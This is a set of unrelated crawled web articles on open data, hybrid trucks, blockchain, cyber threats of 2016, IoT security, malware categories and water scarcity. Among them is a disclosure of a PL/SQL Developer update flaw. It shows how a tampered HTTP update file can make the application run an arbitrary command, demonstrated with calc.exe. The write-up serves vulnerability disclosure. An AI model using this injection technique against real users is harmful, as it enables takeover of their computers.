must be met for data to qualify as open. (The White House has seven similar principles.) Those conditions relate to access, redistribution, reuse, attribution, integrity and distribution of license. They also specify that there should be no discrimination against people, groups or fields of endeavor; there should be no technological restrictions; and a license must not be specific to a package or restrict the distribution of other works. "In most jurisdictions, there are intellectual property rights in data that prevent third parties from using, reusing and redistributing data without explicit permission," Open Knowledge states in its "Open Data Handbook." "Even in places where the existence of rights is uncertain, it is important to apply a license simply for the sake of clarity. Thus, if you are planning to make your data available, you should put a license on it -- and if you want your data to be open, this is even more important." The chief data officer's role As open data's importance grows, an official government function has evolved in the form of the chief data officer. Cities, states, federal agencies and even countries are beginning to establish official roles to oversee open-data implementation. Municipalities (San Francisco, Chicago, Philadelphia), federal agencies (Federal Communications Commission, Federal Reserve Board), states (Colorado, New York) and countries (France) have, had or plan to have an executive-level chief data officer. According to Project Open Data's sample position description, the chief data officer is "part data strategist and adviser, part steward for improving data quality, part evangelist for data sharing, part technologist, and part developer of new data products." As with the newly popular chief innovation officer, the verdict is still out on whether that role and title will be widely adopted or will simply fall under the auspices of the agency CIO or CTO. Building an open-data strategy As governments begin to execute sustainable, successful open-data plans, Data.gov's Holm recommends that agencies create teams of key stakeholders composed not just of policy-makers but also internal data owners, including contractors and partners. The teams should think strategically about their mission and what they want to accomplish, and brainstorm how others might use the data. For example, the Interior Department announced the creation of a Data Services Board responsible for the agency's data practices, saying in a September 2013 memo that "it is crucial that this activity include mission and program individuals as well as IT specialists so that the entire data life cycle can be addressed and managed appropriately." Holm recommends that such teams meet every two to four weeks to accomplish their work and determine an appropriate frequency for getting together to maintain momentum. As more and more innovative government executives begin to strategize about the treasure trove of public information that could be set free and transform the way we live, the ecosystem's potential is unlimited.
<urn:uuid:8ac7be6f-cdac-4351-b9d1-99844d202f0b>
CC-MAIN-2017-09
https://fcw.com/articles/2014/06/09/exec-tech-brief-history-of-open-data.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00503-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926859
1,824
3.203125
3
To launch its single-stream recycling program, Ann Arbor, Mich., officials didn't have to look far to find a solution that could save money and fuel. In July, the city became the first in Michigan to purchase hydraulic hybrid trucks, built using technology pioneered by the U.S. Environmental Protection Agency's National Vehicle and Fuel Emissions Laboratory in Ann Arbor. Used for recycling collection, these garbage trucks don't store energy in batteries like most hybrid cars. Instead, the new hybrid system stores braking energy in hydraulic fluid, which then propels the trucks at initial acceleration. This makes the technology ideal for heavy-duty vehicles that do a lot of stop-and-go driving, such as shuttle buses and garbage trucks, because it boosts efficiency and keeps costs low. "There are more options than ever before to help people, businesses and government save money at the pump, reduce our dependence on oil and improve air quality," according to Sean Reed, founder and executive director of the nonprofit Clean Energy Coalition (CEC), an organization dedicated to expanding clean energy technologies in the state. "The role we take is to try to secure the funding necessary to make these things a total no-brainer." With a $40,000 price tag per truck, the solution wasn't cheap. But on behalf of Ann Arbor, the CEC secured a subgrant of about $156,000 from the American Recovery and Reinvestment Act to cover those costs, Reed said. "There are CECs all around that can help other municipalities as well," said James W. Parks, manager of communications for Eaton Corp., which manufactured the Hydraulic Launch Assist (HLA) system added to the trucks. "It's certainly helpful when there are incentives for the end-user." According to Eaton Corp., the city can expect fuel economy savings of up to 30 percent compared to a conventional diesel powertrain, and see return on investment in two to three years. The city estimates saving 1,000 gallons of diesel gas per truck every year, which equates to $73,000 in fuel savings and $26,500 in reduced maintenance costs for its four trucks over the 10-year service life. Also, with the new system, emissions should be cut down 20 to 30 percent, and the trucks should only need one brake job a year instead of four. Eaton touted other benefits of the hybrid trucks such as reduced launch noise (a hydraulic-powered launch is quieter than the diesel launch) and reduced braking noise, a common neighborhood complaint with large trucks. The HLA system launched last fall, which puts Ann Arbor's trucks among the first 25 deployed nationally with the hybrid technology, said Vince Duray, chief engineer at Eaton Corp. Other Eaton units have been shipped to Dallas/Ft. Worth and Houston. According to Chris Grundler, chief executive of the EPA's National Vehicle and Fuel Emissions Laboratory, heavy trucks account for about 20 percent of the nation's man-made emissions of carbon dioxide. Emissions from heavy trucks are growing faster than passenger cars.
<urn:uuid:38021633-6877-4e2b-b17a-67a985e54258>
CC-MAIN-2017-09
http://www.govtech.com/technology/Hydraulics-on-Hybrid-Recycling-Trucks-to.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00447-ip-10-171-10-108.ec2.internal.warc.gz
en
0.956188
623
2.8125
3
HALF MOON BAY, Calif. – Experts at a recent technology conference agreed that blockchain has a bright future, but warned it may be a rocky ride until that future arrives. Blockchain is a distributed database that uses a secure digital ledger of transactions that users can share across a computer network. It’s also the technology behind virtual currency bitcoin. “When you are at the leading edge there will be mistakes. People will get a lot wrong in the next five years. I think of it kind of like running with scissors,” says Constellation Research analyst Steve Wilson at the Oct. 26 Connected Enterprise conference hosted by his company. [ Related: What is blockchain and how does it work? ] But blockchain enthusiast Richie Etwaru, chief digital officer at IMS Health, had a different take. He started by pointing to the colorful pair of sneakers he was wearing and noted he bought them using bitcoin, the controversial digital currency that’s been plagued by security issues. “I think blockchain is the biggest thing I’ve seen in my life,” says Etwaru. “I work in healthcare and bitcoin to blockchain is like what AOL chat was to the internet, and bitcoin is only one substantiation of blockchain.” Blockchain can help the healthcare industry build trust In the healthcare industry Etwaru says blockchain can help establish new business models that overcome what he describes as the massive absence of trust that exists today among patients, doctors, the pharmaceutical industry and the government. “We started thinking of how we can engineer trust into the network and the distributed ledger (i.e. blockchain) is a great way to solve the trust issue because the information is owned by everyone and no one, and can be seen by everyone and no one,” he says. “It’s immutable, you can’t reverse it, it’s pretty decently encrypted and it can be permissions-based.” [ Related: How CIOs explain blockchain to their CFO ] One example Etwaru points to is that trials for new drugs are often flawed because patients don’t trust how their information is going to be used. “With blockchain you could do things like citizen research for healthcare. There could be autonomous organizations like a Wikipedia of research on cancer based on an abundance of trust enabled by blockchain,” said Etwaru. Blockchain can disrupt the cybersecurity landscape Mike Kail,chief innovation officer at Cybric, a company that’s looking to “disrupt the cybersecurity landscape” with new services, says blockchain has got people thinking differently about what’s possible. Kail says blockchain technology promises to change the status quo of having to trust a broker to complete financial transactions to a system of automated, verifiable transactions that eliminates the middleman. Speaking more broadly, he says blockchain can bring more efficiency to every company with a supply chain challenge. [ Related: How blockchain will disrupt your business ] For companies looking to test the blockchain waters he suggests figuring out a small use case where you can apply blockchain methodology and monitor the results. Another speaker, Shawn Wiora, cofounder and CEO of Maxxsure, a cybersecurity and cyber insurance company, is using blockchain to offer new kinds of services. “We’re able to offer things like variable premiums for a cyber insurance policy that changes as your cyber profile changes,” said Wiora. “Does anyone else offer that?” he asked rhetorically. But even with some companies already innovating, veteran Silicon Valley product executive Chirag Mehta says blockchain’s best days are clearly ahead of it. “Blockchain looks like what the cloud looked like 10 or 15 years ago,” says Mehta, a former executive at SAP and adjunct professor at Santa Clara University where he teaches such topics as web services and cloud computing to graduate students. One difference he sees vs. the cloud though that’s surprised him, is that companies big and small seem to be interested in exploring blockchain’s potential. “Big companies weren’t as interested in the cloud in the early days,” says Mehta. “They weren’t as ready to jump in.” What blockchain does really well, he adds, is provide the technical integrity necessary to let you trust a series of events. “But don’t confuse that with security,” he emphasized. If blockchain needs a blue chip, big name advocate it has one in IBM. Aron Dutta, global head of blockchain at IBM, says he’s already running blockchain technology globally across industries. He sees blockchain as giving companies a way to rethink business models and make more money. Dutta says he has over 4,000 PhDs and 100,000 consultants he can call on to aid his work at IBM, so stay tuned. “It’s not about use cases,” he emphasizes. “It’s about business models.” David Needle is a technology journalist based in Silicon Valley. This story, "Why Blockchain’s growing pains will be worth it" was originally published by CIO.
<urn:uuid:75c9efb1-042b-4767-83b8-a22ceadf8307>
CC-MAIN-2017-09
http://www.csoonline.com/article/3137004/security/why-blockchain-s-growing-pains-will-be-worth-it.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00499-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958114
1,095
2.546875
3
Cunningham W.P.,Claudia Taylor Johnson High School | Joseph C.,Claudia Taylor Johnson High School | Morey S.,Claudia Taylor Johnson High School | Santos Romo A.,Claudia Taylor Johnson High School | And 3 more authors. Journal of Chemical Education | Year: 2015 A simplified activity examined gas density while employing cost-efficient syringes in place of traditional glass bulbs. The exercise measured the density of methane, with very good accuracy and precision, in both first-year high school and AP chemistry settings. The participating students were tasked with finding the density of a gas. The discovery activity facilitated their understanding of the basis of the table of atomic masses. This activity should provide instructors of pre-AP and AP chemistry classes with an acceptably precise and accurate single-lab-period investigation that functions either within the gas law unit or introduction to atomic theory and atomic masses. © 2015 The American Chemical Society and Division of Chemical Education, Inc. Source
<urn:uuid:ce3fb72e-c655-498b-87aa-2130b8d1edfe>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/claudia-taylor-johnson-high-school-733127/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00499-ip-10-171-10-108.ec2.internal.warc.gz
en
0.893418
206
3.203125
3
The year 2016 will not only be remembered for Trump’s surprise victory in the US election, or for Brexit, or for saying goodbye to so many public figures like David Bowie, Alan Rickman, Prince, Muhammed Ali and Carrie Fisher, just to name a few. Last year was also one of the most challenging for cyber-security. Hackers were busier than ever stealing valuable data and credentials, finding flaws in security systems and sending phishing campaigns to an ever-increasing number of victims – both businesses and individuals. What are some of the lessons we can take away from 2016 cyber-threats? The critical importance of cyber-hygiene. Nowadays, it is more vital than ever that passwords are changed regularly, and not only when a data breach goes public. 2016 was host to the biggest data breach ever recorded, suffered by the industry giant Yahoo. 500 million user accounts were stolen back in 2013, meaning that for 3 years, the compromised credentials of the users were probably on sale on the Dark Web. Since the breach wasn’t made public for some time, it highlights the importance of regularly changing passwords as well as using strong passwords (a hard-to-guess combination of upper and lower case letters, numbers and symbols). The recommended time-frame to change ones’ passwords is every 3 months, however, research shows that most users don’t apply this rule: a lot of the time, users stick to one single password for all of their accounts, and hardly ever change it. That is like gold to hackers who rely on users’ sluggishness: if users never update their passwords, stolen credentials available on the Dark Web can remain accurate for months, even years; thus, the risk of users being hacked is sky rocking. Hackers are now also meddling in political matters. The US Election hack is proof that the political landscape can evolve based on cyber-criminal hacks. The exposure of confidential and private emails have definitively cast a big shadow on Hillary Clinton’s campaign, and even though the actual origin of the hack is to this day still unknown (state hackers? Anonymous? WikiLeaks?), this new trend is a game changer and raises the following question for 2017: will hackers interfere in other elections, such as in Germany or France in the next few months? Bigger targets mean bigger gains for criminals. In 2016, hackers focused on data breaches and targeted more large companies and organisations than ever before. Some of the (publicly disclosed) victims of massive data breaches were: Dropbox, LinkedIn, Verizon, Snapchat, Yahoo, Tumblr and Myspace; just to name a few. Millions of credentials were compromised. Note: this trend doesn’t mean that small companies are less at risk. It’s true that hackers now tend to target more and more of the big fish, but cyber-attacks on the small fry continue to rise, because they are easier prey, and are still very profitable. DDoS attacks proliferated. Distributed Denial of Service attacks continue to evolve rapidly, and are now used more than ever. In 2016, DDoS campaigns increased in frequency and size, with hackers making use of DNS and DNSSEC to intensify their offensive. The common link in almost all DDoS attacks is the widespread use of Internet of Things (IoT) botnets, created with malware to compromise insecure IoT devices. Mirai is the most frequently used malware in DDoS campaigns. Ransomware remained highly popular amongst hackers, and highly profitable too. Research showed that new ransomware samples increased by 80% in 2016, with a 600% growth in new ransomware variants. The industries most targeted by ransomware attacks were the financial sector, the educational sector and the health sector (especially hospitals). Hackers worked hard to lock these institutions out of their critical data, making it hard not to pay the ransom straight away. New ransomware variants, incorporating substantial technical advances, made their debut in 2016. Some advances included: the use of partial and full hard disk encryption (instead of encrypting single files); and the exploit of new delivery systems. The number of ransomware attacks rose frighteningly high, as did their efficiency and the ransom prices. This resulted in three alarming consequences: first, cyber-criminals used their profits to finance even more advanced threats and highly-evolved ransomware samples; second, more hackers turned their attention to this cheap yet lucrative type of cyber-attack; third, hackers are now also offering ransomware as a “service” for non-tech-savvy criminals. It is no wonder the number one security-threat for businesses in 2017 is ransomware attacks. 2016’s cyber-threat landscape in a nutshell: - 51% of Americans were affected by a security incident - Cyber-attacks cost an estimated $400 billion globally - Data breaches increased by 23% - The global average total cost of a data breach was $3.8 million - About 50% of American organisations underwent a ransomware attack - $209 million were paid to ransomware hackers in Q1 alone More than ever before, cyber-criminals in 2016 were focused on remaining one step ahead in the cyber game, by continuously improving their schemes and innovating with new threats. One thing is for sure: the only constant in cyber-criminality is the perpetual evolution of threats.
<urn:uuid:edd9df8b-44b4-4dcc-bfc7-1e6e21c69f81>
CC-MAIN-2017-09
https://fraudwatchinternational.com/industry-news/2016s-important-lessons-cyber-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00619-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955366
1,089
2.875
3
While looking into PL/SQL Developer – a very popular tool for working with Oracle databases, to see how it encrypts passwords I noticed something interesting. When testing Windows applications, I make it a habit to have Fiddler running, to see if there is any interesting traffic – and in this case, there certainly was. PL/SQL Developer has an update mechanism which retrieves a file containing information about available updates to PL/SQL Developer and other components; this file is retrieved via HTTP, meaning that an attacker in a privileged network position could modify this file. This file is retrieved each time the application starts, and if a version listed in the file is greater than the version installed, the user will be prompted to upgrade (default behavior; otherwise user not prompted until they select Help | Check Online Updates). They have the following options: - Update: If a URL is provided, the application will download a file (also over HTTP), and apply the update. If no URL is provided, the option is not presented to the user. - Download: Executes the URL provided, so that the user’s browser will open, and immediately download the file. This is typically an executable (*.exe); as is the case elsewhere, the file is retrieved over HTTP, and no validation is being performed. - Info: If a URL, it’s executed so that the user’s browser opens to the specified URL; otherwise content is displayed in a message box. The are (at least) two issues here: - Redirect to malicious download; as the user is likely unaware that they shouldn’t trust the file downloaded as a result of using the Download option, an attacker could replace the URL and point to a malicious file, or simply leverage their privileged position to provide a malicious file at the legitimate URL. - Command Execution; when the user selects the Download option, the value in the file is effectively ShellExecute’d, without any validation – there is no requirement that it be a URL. If a command is inserted, it will be executed in the context of the user. This means that a user believing that they are downloading an update, can actually be handing full control over to an attacker – this is a case where not bothering to use HTTPS to secure traffic, can provide multiple methods for an attacker to gain control of the user’s PC. This is a great example of the importance of using HTTPS for all traffic – it’s not just about privacy, it’s also critical for integrity. The tested version of PL/SQL Developer was 11.0.4, though the issue likely well predates that version. The vendor reports that this issue has been addressed by enforcing HTTPS on their website, and application changes made in version 11.0.6. It is recommended that all users update to the latest version. The update file is retrieved from http://www.allroundautomations.com/update/pls.updates – the request issued by the application looks like this: GET http://www.allroundautomations.com/update/pls.updates HTTP/1.1 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Here’s what a response looks like – it’s a INI-like file, the Download value is the item we care about most here: HTTP/1.1 200 OK Date: Thu, 04 Feb 2016 21:50:18 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Last-Modified: Fri, 11 Sep 2015 09:10:32 GMT Keep-Alive: timeout=5, max=99 WhatsNew=Fixed "List index out of bounds" error during document generation WhatsNew=Upgraded to work with PL/SQL Developer 9.0 WhatsNew=Improved download and Installation of Red Gate products from within Plug-In WhatsNew=New version with Timezone correction and some bugfixes. WhatsNew=New: allow columns to be included/excluded from export, allow first column (Line No) always include/exclude from export WhatsNew=New: Updated for PL/SQL Developer 7.1 By changing the returned file, replacing this line: When the user selects the Download option, calc.exe will be executed. Here is an example of a pls.updates file that demonstrates this flaw (the key changes are increasing the Version, so that the user will see it as an update, clearing the Update value, so the only option is Download, and setting Download to the command that you wish to be executed): Thanks to Garret Wassermann of CERT/CC for his assistance and Allround Automations for addressing the issue.
<urn:uuid:76f71ea8-1fa4-42ad-b99f-a1facac3fa4c>
CC-MAIN-2017-09
https://adamcaudill.com/category/security_research/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00195-ip-10-171-10-108.ec2.internal.warc.gz
en
0.719412
1,060
2.5625
3
When it comes to cybersecurity, many school districts are woefully behind the times, often relying on web content filters older than their students to protect against cyber attacks. The thing is, cyber threats have evolved rapidly and the old tools just don’t cut it anymore. School districts typically operate on shoestring budgets, a reality that affects how much they can spend on cybersecurity. That means many haven’t been able to keep up with the increasing sophistication of cyber threats. And that makes them a prime target for hackers. Earlier this year, a district in South Carolina had to pay $10,000 to regain access to its data after a ransomware attack. An attack at a Mississippi school district forced it to shut down all its servers, disrupting operations for weeks. In 2014, the private information of 10,000 employees at Prince George’s County, MD, public schools was compromised in an attack. Sadly, that’s just a small sample of a growing list of cyber misdeeds. Cybercriminals that attack school networks have no shortage of motives. While ransomware is strictly a profit-making endeavor, perpetrators also can be students trying to change grades, stop testing or embarrass classmates and teachers. And of course, there are the disgruntled former employees seeking revenge. Failing to properly secure school networks can have consequences. Schools need the right tools and protocols in place to comply with regulations. Those regulations include CIPA (Children’s Internet Protection Act), which deals with children’s access to obscene or harmful content, they must also contend with other regulations, and FERPA (Family Educational Rights and Privacy Act). The latter governs the collection, storage and dissemination of student data such as academic evaluations, grades, social security numbers, attendance records and medical information. FERPA violations can lead to a loss of federal funding for a school district. Now, it would take an outright refusal to comply with FERPA for the Department of Education to cut funding, but the threat is there. And if Congress approves a proposed amendment to restrict funding to schools lacking sufficient security policies and procedures, non-compliance will become a more serious issue. To achieve compliance and a strong security posture, school districts need to invest in security solutions designed for today’s cyber threats. A centralized monitoring solution that provides visibility across the network is an absolute necessity. Schools need the same level of protection as the enterprise. And that means deploying tools that protect devices on and off campus, manage resource access, monitor systems for possible intrusions and malware incursions, and facilitate the enforcement of security policies. Getting that level of protection in the past cost big bucks, but affordable cloud-based solutions offering comprehensive security are available today. The need for these tools will only continue to grow as cyber threats grow in intensity and sophistication. Fighting the threats simply can’t be done with tools that were already in place before some students were born. Read more about securing student data against threats
<urn:uuid:5ae2776c-8f74-44c9-840f-1d04a60d0a18>
CC-MAIN-2017-09
https://blog.iboss.com/sled/as-cyber-threats-intensify-schools-need-to-update-security-tools
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00195-ip-10-171-10-108.ec2.internal.warc.gz
en
0.954761
609
2.78125
3
Programs categorized as Malware pose a significant security risk to the user's system and/or information. Types of programs in the Malware category include viruses, worms and trojans, among other threats. These threats can perform harmful actions such as stealing personal or program data, secretly manipulating the device or installed programs, or completely blocking the user from using the device. Malware is usually automatically disinfected by F-Secure Antivirus products. Types of Malware | Virus || Integrates its own code into program or data files and spreads by integrating itself into more files each time an affected file is run. | | Worm || | Uses computer or network resources to make complete copies of itself and distribute them to other victims. May include code or other malware to damage both the system and the network. Worms can also be typed more specifically based on the kind of network they use to spread: - Net-Worm: over a local network or the Internet - Email-Worm: via emails, either contained in the email itself or as file attachments - P2P-Worm: in files sent over peer-to-peer (P2P0 networks - IM-Worm: over instant messaging (IM) networks - IRC-Worm: over Internet Relay Chat (IRC) channels - Bluetooth-Worm: via Bluetooth broadcasting | Rootkit || Hides itself or other files from the device's security programs; can be used by remote users to manipulate the device. | | Backdoor || Allows remote users to manipulate a program, computer or network. | | Trojan || | Uses misdirection, misinformation, omission or outright fraud to trick the user into installing or running it, so that it can perform potentially unwanted/harmful actions. It does not replicate. Trojans can be typed more specifically based on the kind of actions they secretly perform: - Trojan-Spy: installs spying programs such as keyloggers - Trojan-PWS: steals passwords and other sensitive information - Trojan-Downloader: downloads programs from a remote server, then installs and launches them - Trojan-Dropper: carries at least one program, which it installs and launches - Trojan-Proxy: allows remote users to turn the infected system into a proxy server to anonymously - Trojan-Dialer: connects to the Internet via over premium-rate telephone lines. May also lead to unsolicited or inappropriate sites. | Rogue || Uses high-pressure, or misleading messaging or outright fraud to pressure users into purchasing antivirus software that may not perform as claimed. | | Exploit || Takes advantage of a vulnerability in a program or operating system to gain access or perform actions beyond what is normally permitted. | | Packed || Compressed to a smaller size using a packer program known to be used by other malware. | | Constructor || A utility program used to construct malware. | Programs categorized as Spyware introduce a security risk that may affect the user's personal data. Types of programs in the Spyware category include trackware and adware. These programs may offer a useful service in exchange for being allowed to gather information from or about the user. The kind of information gathered by these programs varies, and may include items such as details of the system or installed programs; web browsing behavior and history; and most importantly, personal details. Legal implications may also arise based on where and how the program is used, and how the information is collected, transmitted and stored. If a user is aware of and accepts the potential risk associated with a program classed as Spyware, they can configure the F-Secure security product to exclude it from being scanned. Types of Spyware | Spyware || Collects information about the user's web browsing behavior or preferred applications the data collected may be stored locally or sent out. | | Trackware || Allows a third party to identify the user or their device, usually with a unique identifier. The most common trackware is tracking cookies. | | Adware || Delivers advertising content, either in the web browser, on a PC's Desktop or within an application. | Programs categorized as Riskware are considered safe when used by an authorized person in an appropriate situation. If misused, or used by an attacker, the program may be a security risk. Riskware programs are applications that may pose a security risk when used inappropriately, or by an attacker. For example, keyloggers are utilities that may be used by system administrators in the course of their authorized work, but may also be maliciously used to secretly monitor users. If user is aware of and accepts the potential risk associated with a program classed as Riskware, they can configure the F-Secure security product to exclude it from being scanned. Types of Riskware | Monitoring-Tool || Monitors and records selected or all actions of a user on a device | | Hack-Tool || Bypasses access restrictions or security mechanisms to give users access or the ability to perform actions beyond what is normally permitted | | Application || Introduces a security risk if misused or maliciously used | Potentially Unwanted Application(PUA) A Potentially Unwanted Application (PUA) is a program that has behaviors or aspects which are considered undesirable, unwanted or risky, but does not meet the stricter definition of malware. If the user is aware of and accepts the potential risk associated with a program classed as PUA, they may elect to keep and use the application, or allow the F-Secure security product to remove it. For more information about PUAs, see Classifying Potentially Unwanted Applications.
<urn:uuid:c62ef45c-9aef-4006-8d95-f39a5438eaef>
CC-MAIN-2017-09
https://www.f-secure.com/en/web/labs_global/classification
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.84/warc/CC-MAIN-20170219104611-00191-ip-10-171-10-108.ec2.internal.warc.gz
en
0.905063
1,183
3.21875
3
Internet Of Things Security Reaches Tipping PointPublic safety issues bubble to the top in security flaw revelations. It all began more than four years ago with HD Moore's groundbreaking research in embedded device security -- VoIP, DSL, SCADA, printers, videoconferencing, and switching equipment -- found exposed on the public Internet and sporting diagnostics backdoors put in place by developers. The holes could allow an attacker access to read and write memory and power-cycle the device in order to steal data, sabotage the firmware, and take control of the device, Moore, chief security officer at Rapid7 and creator of Metasploit, found. "This feature shouldn't be enabled" in production mode but instead deactivated, he told Dark Reading in a 2010 interview on his research on the widespread vulnerability in VxWorks-based devices. Fast forward to Black Hat USA and DEF CON 22 last week in Las Vegas, where the dominant and overarching theme was the discovery of, yes, intentional backdoors, hardcoded credentials, unencrypted traffic, and critical systems lumped on the same network as noncritical functions, in today's increasingly networked and automated commercial systems. And those embedded hardware weaknesses were on display by researchers who found them in cars, TSA checkpoint systems, satellite ground terminals, cell phones and networks, home automation and security systems -- and even baby monitors. Moore's 2010 findings and subsequent research should have been a major wakeup call for the Internet of Things. But instead the problem has now snowballed and gone mainstream as industries not schooled in cyber security got their first lesson in white-hat hacking in the past year as massive holes in their consumer products have been discovered and publicized. Now that these vulnerabilities, many of which require relatively simple fixes, have spilled into the arena of public and physical safety with hackable cars, pacemakers, road traffic systems, and airplanes, the tipping point for solving the security of Internet-connected things may finally have arrived. It's the public safety angle that may ultimately capture the attention of legislators and regulators -- if not the consumer product vendors themselves -- to start taking security seriously, experts say. "Everybody should be worried a lot. It's modified Linux in most cases [in these devices]" and there has been little if any improvement in its security, says Marc Maiffret, CTO at BeyondTrust. "A lot have lame vulnerabilities. Name your embedded system -- it's going to have something." Just how to get the consumer product world in sync with security research is the problem. Researchers routinely report bugs to the vendors and government-based organizations like the ICS-CERT, but they still either get ignored altogether by the vendors or in some cases face legal threats. "There's no framework for the level of accountability, no responsibility to accept [by the vendors]. The risk is passed on to the consumer," says Trey Ford, global security strategist at Rapid7. But there was a shift last week in Vegas, as the security community began pitching and proposing some next steps to fix the problem of vulnerable consumer goods. I Am The Cavalry, a grassroots organization formed to bridge the gap between researchers and the consumer products sector, last week at DEF CON published an open letter to CEOs at major automakers, calling for them to adopt a new five-star cyber safety program. The group also provided a petition via change.org for others to sign. The voluntary program includes secure software development programs, vulnerability disclosure policies, forensics information, software updates, and the segmentation and isolation of critical systems on the car's network. Joshua Corman, chief technology officer at Sonatype and co-founder of I AmThe Cavalry, says with lives at risk with many of these consumer products, such as cars, the time has come for a framework and action. Attacks against cars and other critical consumer things are a matter of public safety, he says. "You want to measure twice and cut once," he says of the need for baking security into such consumer products. [Yes, the ever-expanding attack surface of the Internet of Things is overwhelming. But next-gen security leaders gathered at Black Hat are up to the challenge. Read The Hyperconnected World Has Arrived.] Another group of security researchers is helping out smaller embedded device vendors with initial pro bono security testing of pre-production code for their IP cameras and other consumer devices. "We're going to have researchers looking at their pre-production hardware before getting it in [consumers'] hands," Mark Stanislav, a researcher with DuoSecurity, which is one of the founders of the group, said in an IoT session at DEF CON. So far, Belkin, DropCam, DipJar, and Zendo are among the IoT firms that have taken BuildItSecure.ly up on its offer. The hope is some of these smaller firms may ultimately offer bug bounties to researchers who find vulnerabilities, or will end up engaging with the firms in consulting gigs, for example. BeyondTrust's Maiffret, meanwhile, says consumer product vendors should at least open up their Linux code to open source so it can be patched and updated. "There are a lot of ARM processors running Linux and they have some software apps sitting on top... a NAS or IP camera," for instance, he says. "At least open it up so Linux can manage, patch and update it." That same theme was echoed by Dan Geer in his keynote address at Black Hat last week. Geer proposed that software that's no longer updated or supported by its vendors should be transferred to the open-source community. He also suggested that embedded devices have a finite life span. "Embedded systems, if having no remote management interface and thus out of reach, are a life form, and as the purpose of life is to end, an embedded system without a remote management interface must be so designed as to be certain to die no later than some fixed time," Geer told attendees. "Conversely, an embedded system with a remote management interface must be sufficiently self-protecting that it is capable of refusing a command." The bottom line is there's a lack of consumer product vendors taking ownership of the security of these products, Maiffret says. "We're always going to have a constant state of vulnerabilities," he says. Billy Rios at Black Hat USA discusses TSA checkpoint systems he found exposed on the public Internet. Photo Credit: Sarah Sawyer The good news is that much of the research in the more critical consumer device security -- cars, traffic control systems, for instance -- is ahead of the attackers, as far as we know, experts say. "Some of the hardware is very difficult to get," such as traffic control sensors, says Cesar Cerrudo, who last week at DEF CON provided new details on vulnerabilities he found in vehicle traffic control systems. "You can't go to the store. That's good for bad guys [in] that it's not easy. But at some point they can steal them or get them in some way." Cerrudo set up a phony company in order to buy traffic sensors from Sensys Networks for his research, he says. But even a more easily accessible smart TV or egg counter, if compromised, can wreak havoc on consumers. "Whatever is connected to the Internet or a network is a possible target," Cerrudo says. "We can put a man on the moon, but we can't make software reliable?" says Rick Howard, CSO at Palo Alto Networks. Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio
<urn:uuid:ba730de6-421a-4af9-914c-a61670f4315f>
CC-MAIN-2017-09
http://www.darkreading.com/vulnerabilities---threats/internet-of-things-security-reaches-tipping-point/d/d-id/1298019?_mc=RSS_DR_EDT
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00539-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955609
1,592
2.515625
3
Water scarcity is a reality for about 1/3 of the world’s population. Driving increasing water scarcity is the way we manage water for food. Projections indicate that a growing, wealthier population may need as much as 70% more food by 2050. With water scarcity already posing a constraint to food production in many areas of the world, a major question is whether we have enough water to grow enough food. In fact, it is not the amount of water that is lacking globally. Rather we are lacking in good management of water and land resources. Finding solutions will require a different set of thinking and actions moving forward. Water scarcity has brought about a new set of problems that require new solutions. The presentation and discussion will cover water scarcity and drivers of water use within and outside the water sector and include climate change; it will ask how much more water will be needed to grow enough food; then it will provide a direction for finding solutions to future water and food problems. David Molden is Deputy Director General for Research at the International Water Management Institute (IWMI). He has a PhD, specializing in groundwater hydrology and irrigation, and has broader interests in integrating social, technical and environmental aspects of water management. Recently, David coordinated a global program involving over 700 participants to produce a Comprehensive Assessment of Water Management in Agriculture, with results documented in the publication Water for Food, Water for Life (http://www.iwmi.cgiar.org/Assessment/). David was presented with the CGIAR Outstanding Scientist Award. RecordedApr 23 201037 mins Your place is confirmed, we'll send you email reminders Laura Tam, SPUR & Manucher Alemi, Department of Water Resources More than two-thirds of the Bay Area’s water is imported from outside the region. Today these supplies are regularly threatened by drought, earthquakes, water quality impairments and new regulations on availability and usage — risks that will intensify with future climate change. Meanwhile, our region of 7 million people will add 2 million more by 2040. Do we have the water we need to support our projected population growth? And what are the most sustainable and reliable ways to supply our future water needs? SPUR's report Future-Proof Water, presented by Laura Tam, analyzes the Bay Area’s current water supplies and future growth projections, then recommends the best tools for meeting our water needs — both in the near term and through the end of the century. The Governor’s California Water Action Plan (CWAP) released in January 2014 is a five-year plan outlining the ten central actions towards a sustainable water management. In January 2015, California Natural Resources Agency, California EPA and Department of Food and Agriculture released the CWAP Implementation Report, which highlights achievements to date and outlines activities for the next four years. Manucher Alemi will provide an overview of the CWAP and the Proposition 1 to achieve sustainable water management along with DWR’s roles, including expanding water conservation and water use efficiency. Peter Rumsey, Point Energy Innovations; Bobby Markowitz, Ecological Concerns Inc., Central Coast Wilds Onsite water resources including rainwater catchment and greywater can be used to decrease or eliminate net water demand of commercial and residential developments. Integrated design incorporating smart water-efficient landscape design with water re-use systems result in "Closed Loop Design". New practices such as bringing rainwater into the house for domestic, non-potable use and using grey water to irrigate landscapes with native and drought tolerant plants with innovative irrigation techniques, may be the future of development in California and beyond as 